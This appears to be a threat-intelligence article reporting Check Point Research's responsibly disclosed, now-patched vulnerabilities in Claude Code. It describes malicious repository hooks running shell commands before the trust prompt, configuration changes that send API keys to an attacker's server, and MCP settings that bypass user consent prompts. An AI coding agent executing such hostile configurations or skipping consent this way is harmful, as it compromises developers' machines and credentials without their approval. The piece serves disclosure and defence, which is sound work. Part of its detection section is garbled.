Check Point Research has uncovered and disclosed three critical security vulnerabilities in Anthropic's AI-powered coding assistant, Claude Code. These flaws, which have since been patched, exposed developers to silent system compromise. The most severe vulnerability (CVE-2025-59536) could allow an attacker to achieve remote code execution (RCE) on a developer's machine merely by tricking them into opening a malicious code repository. Other flaws enabled the theft of API keys (CVE-2026-21852) and the bypassing of user consent mechanisms. The findings underscore the emerging threat landscape where the tools designed to accelerate development can themselves become potent attack vectors.
The vulnerabilities stemmed from the insecure handling of repository-based configuration files within the Claude Code environment. An attacker could craft a malicious project that, when opened, would trigger these flaws without further user interaction.
Code Injection via 'Hooks' (CVE-2025-59536): This high-severity flaw was found in a feature that allows user-defined scripts, or 'Hooks,' to execute automatically when a project is launched. Researchers discovered they could embed a malicious shell command (e.g., a reverse shell) within a project's configuration file. When a developer opened this malicious project, the hook would execute instantly, giving the attacker full control over the victim's machine before any trust prompt could be displayed.
API Key Exfiltration (CVE-2026-21852): This vulnerability allowed an attacker to manipulate configuration settings to redirect the API traffic from Claude Code to an attacker-controlled server. This would cause the tool to send its own sensitive API keys—used to communicate with Anthropic's backend services—directly to the attacker. These keys could potentially grant access to an entire team's shared cloud resources, leading to data theft or modification.
Model Context Protocol (MCP) Abuse: A third flaw involved the abuse of MCP integrations, where settings could be manipulated to bypass user consent prompts for actions performed by the AI, such as executing external tools or accessing files.
There is no evidence that these vulnerabilities were exploited in the wild. Check Point Research responsibly disclosed all findings to Anthropic between July and October 2025, and Anthropic has confirmed that all reported issues have been remediated.
The potential impact on developers and organizations using Claude Code was severe:
This research highlights a fundamental shift in the threat model for developers. The act of 'opening a project' in a modern, AI-integrated IDE can no longer be considered a safe, read-only operation.
Detecting exploitation of these vulnerabilities would require monitoring for anomalous behavior originating from the development environment:
bash, sh, powershell.exe) or network utilities (curl, wget). This is a key principle of D3FEND's Process Analysis (D3-PA).CVE-2026-21852) would be visible as traffic to a non-Anthropic endpoint..claude-hooks, .vscode/settings.json) for suspicious scripts or URL redirects.Ensuring the Claude Code tool is updated to the latest patched version is the primary defense.
Running development environments in isolated containers can prevent a compromise from affecting the host system or network.
Carefully review and harden the configuration of development tools to disable potentially dangerous features like automatic script execution.
Educate developers about the risks of opening untrusted projects from the internet.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.
Help others stay informed about cybersecurity threats